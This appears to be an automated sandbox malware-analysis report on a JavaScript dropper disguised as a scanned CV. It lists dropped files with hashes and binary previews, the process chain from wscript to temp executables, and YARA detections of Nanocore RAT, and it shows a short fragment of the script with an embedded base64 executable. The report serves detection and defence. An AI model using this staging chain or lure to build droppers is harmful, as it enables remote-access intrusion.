.F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.7.2.<./.P.i.d.>.......
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4636
              Entropy (8bit):4.431255888057344
              Encrypted:false
              SSDEEP:48:cvIwSD8zsuJgtWI9uC3Wgc8sqYj+8fm8M4JcOIFPBV+q8vZOrHyVW/Cd:uITfkFCGgrsqYfJPUVK0+g/Cd
              MD5:9D02D834BA6234EA525225B7EC013C55
              SHA1:2FB11794A77693FCCE9030C27D61FBFDE1A35D73
              SHA-256:048D37712DD4949756E6339F9D4790FDBF4D77077813CC987C0E000B7D832BB4
              SHA-512:82E19D18773166DD0BFB454D73133037C0F82CD17EAA1D4DAE9BE60B33E3A4D9E13E8400CD26CE2D448E60BEB36E90E193EFA067C6121826F9768709BADD666F
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1893650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8322
              Entropy (8bit):3.6932905730133228
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNigt6I6YesSU6VgmfESUU++pr689bnksf0Ktm:RrlsNiK6I6YlSU6VgmfESUonXfg
              MD5:5D90DC0E1561C0345EC320718A821D6E
              SHA1:A347C1E445801253B4C92544B1675757F9EA97B0
              SHA-256:0F52F1A5051FF9EACC1FBA72E29530CE465792F9A438F53811AFE4F25735549C
              SHA-512:F6F7DCCF5FEC0ABAA4B7B1316D28A1F7A9C7ABA2908B7A133C161C6C657076480F639A37B0BA1402C82AC5F7AF5D0FBA14AD0193841E9C256DC187A8C9973166
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.3.6.<./.P.i.d.>.......
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4622
              Entropy (8bit):4.418628960586395
              Encrypted:false
              SSDEEP:48:cvIwSD8zsuJgtWI9uC3Wgc8sqYjWa8fm8M4J0HIFd8+q8vwHmwWsMd:uITfkFCGgrsqYKJOo8KSmrsMd
              MD5:1163ED671CCA0E03989EC259C19BFF58
              SHA1:1F0E653F828C87139DBE9A9A62C61F59086F4E8E
              SHA-256:00A19793A2E41B76ABFEAEB79B391C3260426D24FE7572AA2C7BBC0B8A3B9B97
              SHA-512:B0EDD757AFD43167EAEBDDDC55367988CEDB9A68F7C81F3D86F094420187B5025B36B7B187C0F7D79CD6C58A9B223934FC95DBEC5B5114006A7BAA689769130E
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1893650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:Mini DuMP crash report, 14 streams, Wed Feb 1 15:39:51 2023, 0x1205a4 type
              Category:dropped
              Size (bytes):43686
              Entropy (8bit):2.048561419909834
              Encrypted:false
              SSDEEP:192:I3jhQKpJf4K8nYXOz4I7o8DKe/1b0YdRAom3D964NsQ2HGgQ:IH8nY+ztRmYdm9gksnQ
              MD5:1C4D27F8651B8E035545BAB9C1F471F8
              SHA1:4427B1E112224F5A07157C913147CA35DD6EFD8A
              SHA-256:F3F61D669FEEF8A49F30C277CA7BD5E58E3D0752377E33C2E789C8BD96B674E6
              SHA-512:F6A137A50CC023AF3E442BC31B11D0B2F55CD091274C87FFE4633AE98D625F0536317C916793BACFC0288C3AD615EC20078979A70B14A2355DB266A4F85B76BC
              Malicious:false
              Preview:MDMP....... .........c........................(...............N/..........T.......8...........T............................................................................................................U...........B......x.......GenuineIntelW...........T.......p.....c............................. ..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
              Category:dropped
              Size (bytes):8316
              Entropy (8bit):3.6914901782601306
              Encrypted:false
              SSDEEP:192:Rrl7r3GLNitC6m6Ye8SUfpgmfESUU++prM89bwSsfhEwm:RrlsNiI6m6YFSUfpgmfESU6wRfhy
              MD5:3916BE13C2F7CEFC415839EEDB8B9803
              SHA1:2CC0571B115D00D3DCD1F03A7D56370ABA8F47AC
              SHA-256:91B47F9BF2E3C15E04967CBC867AE6E90855A66553CC7F783F6D6B68098B5E06
              SHA-512:FB318D8ACAF771E1B21DE87DCEC90B3B6153BE745E2C8773BCAED613A152A3749AA18A6B03B3A5CAB01EFC628EBD448D68F6C942B4BA9CF48351803A44869787
              Malicious:false
              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.6.0.<./.P.i.d.>.......
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4622
              Entropy (8bit):4.41573187380858
              Encrypted:false
              SSDEEP:48:cvIwSD8zsuJgtWI9uC3Wgc8sqYjc88fm8M4J0HIFoD+q8vwHX+nwWsRd:uITfkFCGgrsqYUJO3KScrsRd
              MD5:DF904AED1BFDF31BA7F1E3F76C8A5579
              SHA1:C1C01838AEF880D20FE503F5488E6D61BB1D8D01
              SHA-256:0FDD10B262B35FD8F5065CE860594903F9B8672AAF72C94659951160B2BDF525
              SHA-512:87CEBEE55F9F148C3EB494B88DF9DF0A693ADEFC584A353E5796F33AB05B6FF42A93AB12DF35313CE99CCA34E0A2494954F4F07A622487BCDEB98A5D50B5CBF8
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1893650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
              Process:C:\Users\user\AppData\Local\Temp\czkdqe.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.355304211458859
              Encrypted:false
              SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
              MD5:69206D3AF7D6EFD08F4B4726998856D3
              SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
              SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
              SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
              Malicious:true
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
              Process:C:\Users\user\AppData\Roaming\vtvt.exe
              File Type:data
              Category:dropped
              Size (bytes):237185
              Entropy (8bit):7.9982150469574975
              Encrypted:true
              SSDEEP:6144:cCbdAXnIU4kwjMc6hNEilm7MseGdK8bUrhN4WiSaVPTl:6sk8McYIM3GsOxVPZ
              MD5:959E92CF0D3C5E07CC5D1FF6E0626681
              SHA1:138BCD7AB393A4C85A42D1CEB296CF82EEBF4120
              SHA-256:020E47863231C08DD26366BFB379EE2F9E579E263BD9F565853934680CECD4D4
              SHA-512:F1364DD909D070DBFDE9230BF3458C870908EA0F92964323F085A1B6F88CD4B5FEF8957EDE8D1A883D700829D2E3328F0F9407679D4750FBDC85158FB865A396
              Malicious:false
              Preview:9..a.2}..=.r....}....T...a.Kp.:.h.U.B<ty:.(.(.$..c....?..:5.:........Ww.hO.u..g....\.Y..>rK5.a..6..y.g\.5....b...!.ce.........T.c..T....G...w.....#{2..i..../.d..f.c._.."Ud...}w.2..l..`.7.....v(..4.^.`8O..0..]\..T.S....6.....XIg.&...N.M...B>.."H.sa.2}...=.1<..{C)k..T.%.a..p.n..^..|ty..(..0$oi`..u=?..:......F..z.)r.n.Hv'.~4%.7.!N.a.6.v"...&..n65..e.0.p;?.La0_...........|.|C..[j.o6{.+!.....7......=.#..rw-...@...[W..o.$V..l... j!......[...J0.?.qF.m.I.?.v.....M.Y.s....\.}S....K...:jg..B>..".j...2}..#...a...}....T.%.a.Kp.:.h.U.B<..!v..(.$....u=?.4w:.:..N.F.Qz..r.~.H.e.....7.!h.a.!.v"....%.65..e.0.p;'...0............|.|C.......{.+n.....7......=.#..rw-...@...[W..o.$V..l... j!......[...J0.?.q..4...?.v.....M.Y.s....\.}S....K...:jg..B>.."H.sa.2}...=......}....T.%.a.Kp.:.h.U.B<ty:.(.(.$..c....?..:.:..N.F.Qz..r.n.Hv^.~4%.7.!..a...v".....65..e.0.p;'.L.0_...........|.|C.......{.+n.....7......=.#..rw-...@...[W..o.$V..l... j!......[...J0.?.q..4...?.v...W{$M4.......
              Process:C:\Users\user\AppData\Roaming\vtvt.exe
              File Type:data
              Category:dropped
              Size (bytes):8251
              Entropy (8bit):7.179118870141873
              Encrypted:false
              SSDEEP:192:darcitQvArWiPv6Ib95T2YFcvQwzRsAjdPMv6/LtNI7ypzV:uCYrNPv66eYFc4As6E6BNI7q
              MD5:417DBDC03BC9796A8B537A17559B8158
              SHA1:1AA1B1B2B90E29869F2D2305D67CD7505F2BDB68
              SHA-256:6FAD3691976A1F915DF85F0904FD303C111C47E7FC8CBE7D78F44D838BDD57AF
              SHA-512:01507DE817997F36042D8F9E514E77FC369B4A0CBABCD949DF18C88D99E97D5E03BD705492A4994D9324225491979D633806EF32474E14A940F8708719A96BC9
              Malicious:false
              Preview:.705m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e....aboZf`Z\V.v...`ZYaZCV.v.j^YV.}.lZAU.w.`Z\^.q.iY.T.}.m^.q.[WlT.}....i.W.y.R.}.^.y.W.q.......XW..Mc.....\7!.K.y.a..`.....Z...Jo.......\GB.Gg.u......X.B.Kg.v......Pp..Nd.w.....\...Ke.}.....Y...Ko.p......G8.u....0<..480fP.401Y7a^?X580..D;.g.....A4...Tgn.`...G.X0P0.80..3cg.a.p0..D.`...igen.a..@.b.e.kX.013^3gR7]804p.F8.a.c..q.ad.G<n.`..D2..qb.e...knj..o.00`...)ecXg`Z]^.q.iYXk^OV.}.lZPU.w.`ZE^.q.iY]T.}.mR.R.t.lT.}._\hR.t...R.}.^.y.W.y.R.u......ZR..Jo....\5$.O
              Process:C:\Users\user\AppData\Roaming\vtvt.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):76800
              Entropy (8bit):6.3497309189930435
              Encrypted:false
              SSDEEP:1536:w/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIPP6l3:w/9cIWcxTZ3km34EFkOs6l3
              MD5:7623E43BAB89AD62BD536D06A1751BB9
              SHA1:64D0B8D58802855EDB202F3F020B3F8CC38E2DEC
              SHA-256:B77D9AF231C99CDFE3818DED5E2A92D3D8ACEDDC973FD115B05AB32EB31132FA
              SHA-512:C0BB95518D714970BF9C0ADFACCA0A57D1B86285DA78666287BB3D3372D09035308108F5FAB0186F49651755C551E0A5E00EB5DFE93B688459E83A384C2B53A6
              Malicious:true
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.|.v..Vv..Wv..Vvdr.v|.Vvdr.v..VvRich..Vv........................PE..L...vD.c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Roaming\vtvt.exe
              File Type:data
              Category:dropped
              Size (bytes):332022
              Entropy (8bit):7.738384043280908
              Encrypted:false
              SSDEEP:6144:NCbdAXnIU4kwjMc6hNEilm7MseGdK8bUrhN4WiSaVPTZ4YjsBnzxTZUm9FTRl:Jsk8McYIM3GsOxVP/jsBnzxTSmFTR
              MD5:B1638C7096858D53B3AA493560BCBA34
              SHA1:7A4832F30D9830F5A06C1CE0260DF318CA19787E
              SHA-256:13538B5228A36EA7CD852EA1ECCCFFFAA39BB9E2D5BDADDAC4A3A3CFD1D5B267
              SHA-512:AF829348D5595CAA00F187A37903945CA95508466E9E9B6BF485EF9088499A71505F77F519508CD75BC71A2CF46F9E14310ECD75CB88665476E6B2534F9BCEB2
              Malicious:false
              Preview:*&......,...................p...........D%.......&............................................................................../...........................................................................................................................................................G...................j...........................................................................................................................................O...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\AppData\Local\Temp\czkdqe.exe
              File Type:data
              Category:dropped
              Size (bytes):8
              Entropy (8bit):2.75
              Encrypted:false
              SSDEEP:3:BiSn:9n
              MD5:7607B5EF99BA0821FFED89B1F164635C
              SHA1:4EAEB2205188BCDDCD31720243A37B46E59B8FA2
              SHA-256:0A047C1F48B067D60EEA2173A5B828BEDF93931AB24F7A15F5FDE993238F7EA9
              SHA-512:7149D600DA5B37CA49D304A901B34DD5679F087AF8F64BA47308F3E8017199425427226925E868D4348665B680FD829AEEA8E91E66D6BA179866F33EBA9463CA
              Malicious:true
              Preview:....j..H
              Process:C:\Users\user\AppData\Local\Temp\czkdqe.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):76800
              Entropy (8bit):6.3497309189930435
              Encrypted:false
              SSDEEP:1536:w/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIPP6l3:w/9cIWcxTZ3km34EFkOs6l3
              MD5:7623E43BAB89AD62BD536D06A1751BB9
              SHA1:64D0B8D58802855EDB202F3F020B3F8CC38E2DEC
              SHA-256:B77D9AF231C99CDFE3818DED5E2A92D3D8ACEDDC973FD115B05AB32EB31132FA
              SHA-512:C0BB95518D714970BF9C0ADFACCA0A57D1B86285DA78666287BB3D3372D09035308108F5FAB0186F49651755C551E0A5E00EB5DFE93B688459E83A384C2B53A6
              Malicious:true
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.|.v..Vv..Wv..Vvdr.v|.Vvdr.v..VvRich..Vv........................PE..L...vD.c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\System32\wscript.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Category:dropped
              Size (bytes):386839
              Entropy (8bit):7.291554601338616
              Encrypted:false
              SSDEEP:6144:jYa6m4H4444C77pjlFt/bh+Ht1rCbv2tcfhczUMXAGkrCIZSYr:jYQ4H4444C7l1/u1rCbyE8UpdmY5
              MD5:44B48773D128C83DB9ECB979EDDCE364
              SHA1:0E15124935DB412664BEC4657527EDA8AB7824BE
              SHA-256:8BDEC989B790DF201F12322B69A5920689D2B1CE1D205C4963D7DA415CD44F95
              SHA-512:539728056C625187226FFE8B4FE741235DF526B13C75E6E8E9ADA372A972EE776DD7788B63B91D7D3FEB4C609332370D7337FE6C05596CCAD0DE0082806FFD86
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):1572864
              Entropy (8bit):4.305813725377395
              Encrypted:false
              SSDEEP:12288:cW5nsyIWUum5Uclike9gVt6tx41kMG74HGc0WgI9OW3c4sD8ky:95nsyIWUumeclio0xV
              MD5:D44E4CF0575FE70FD7B06F4FDFBB3BE3
              SHA1:C60CF1793CFCEACD01FABBC94E03642A7C4CE37B
              SHA-256:E5D4D2BF63C502C6D4C0DD391E414E49FB9FF507C4F6EBAFD22641DE8ACCE653
              SHA-512:C066A148A84C9EE34470E49F214039EC07F1504922F3726329142C74B487D1901C34F99D6B8FC2708E537D1BA679B014807711874FB22377B6CA571BF6F4A050
              Malicious:false
              Preview:regfQ...Q...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..;gS6................................................................................................................................................................................................................................................................................................................................................2:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WerFault.exe
              File Type:MS Windows registry file, NT/2000 or above
              Category:dropped
              Size (bytes):24576
              Entropy (8bit):3.899289093354308
              Encrypted:false
              SSDEEP:384:Vz/5K5OjHKgnVVeeDzex1NKZtjJexFa1osoSwXwhaoi/qfA/DWwsfWe7dsi74:ZBKpg/eeDzejNYtjEHaCsoSw6aoi/qff
              MD5:35F4AF4C8D9D81FCEB96B0FF4C370964
              SHA1:2DE79FAD18645BF0FF28EBC0AC9C96B55FE75694
              SHA-256:D20FB23B7F72E64FFE976B3EACA741C8560AF9677C22CD269D1AE2DA80379969
              SHA-512:E0ECC9B550FC82242DFF75654C30419981AC0D43FA18E6A3F5AC901C64837A8D5C5AB56E902D21DA5F672E6D24C478761BD607D7004ADC58F9C2C926386B6D01
              Malicious:false
              Preview:regfP...P...p.\..,.................. .... ......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..;gS6................................................................................................................................................................................................................................................................................................................................................2:HvLE.^......P.... .......3.0.K..a..e...i............................. ..hbin................p.\..,..........nk,...;gS6......P........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...;gS6...... ........................... .......Z.......................Root........lf......Root....nk ...;gS6.................................. ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck...
              File type:ASCII text, with very long lines (65536), with no line terminators
              Entropy (8bit):5.620807777221134
              TrID:
                File name:SCAN COPY CV 310123.js
                File size:516742
                MD5:c1e6f89b24d1304d31dc64015d9bda62
                SHA1:27f825c528d3011316720bd8011edfed129b3289
                SHA256:06b5465e33770e469fcd576f34f55021df7f348b6b262e8721e23e801629e29e
                SHA512:6ef9b3da0f16fcdc7eb554fbe539539aa9ca15923fe29fd02353cdde3e7904ce96069cfedea560029026543263438c4ef33f4ea0d3ff601018b0212acffc1a32
                SSDEEP:12288:+Kl9/5ZX7bp6aXa3x1t84FJJWzAbPOgOT:ZPh5Sx1eAbGgC
                TLSH:BBB4BDB1DF0D7F651115BA8AF06A9AB02F16278F43CA7114B4C4EEEA7C79310C4BDA64
                File Content Preview:try{String.prototype.endsWith = function(needle){.var emp = this.substr(this.length - needle.length);.return emp == needle;};var aso_ibora = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc
                Icon Hash:e8d69ece968a9ec4
                Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

                Click to jump to process

                Click to jump to process

                Click to dive into process behavior distribution

                Click to jump to process

                Target ID:0
                Start time:16:39:28
                Start date:01/02/2023
                Path:C:\Windows\System32\wscript.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SCAN COPY CV 310123.js"
                Imagebase:0x7ff67f5b0000
                File size:163840 bytes
                MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high

                Target ID:1
                Start time:16:39:31
                Start date:01/02/2023
                Path:C:\Users\user\AppData\Roaming\vtvt.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Roaming\vtvt.exe"
                Imagebase:0x400000
                File size:386839 bytes
                MD5 hash:44B48773D128C83DB9ECB979EDDCE364
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Antivirus matches:
                • Detection: 100%, Joe Sandbox ML
                Reputation:low

                Target ID:2
                Start time:16:39:31
                Start date:01/02/2023
                Path:C:\Users\user\AppData\Local\Temp\czkdqe.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c
                Imagebase:0x400000
                File size:76800 bytes
                MD5 hash:7623E43BAB89AD62BD536D06A1751BB9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:3
                Start time:16:39:33
                Start date:01/02/2023
                Path:C:\Users\user\AppData\Local\Temp\czkdqe.exe
                Wow64 process (32bit):true
                Commandline:C:\Users\user\AppData\Local\Temp\czkdqe.exe
                Imagebase:0x400000
                File size:76800 bytes
                MD5 hash:7623E43BAB89AD62BD536D06A1751BB9
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:.Net C# or VB.NET
                Yara matches:
                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: NanoCore, Description: unknown, Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                • Rule: Windows_Trojan_Nanocore_d8c4e3c5, Description: unknown, Source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
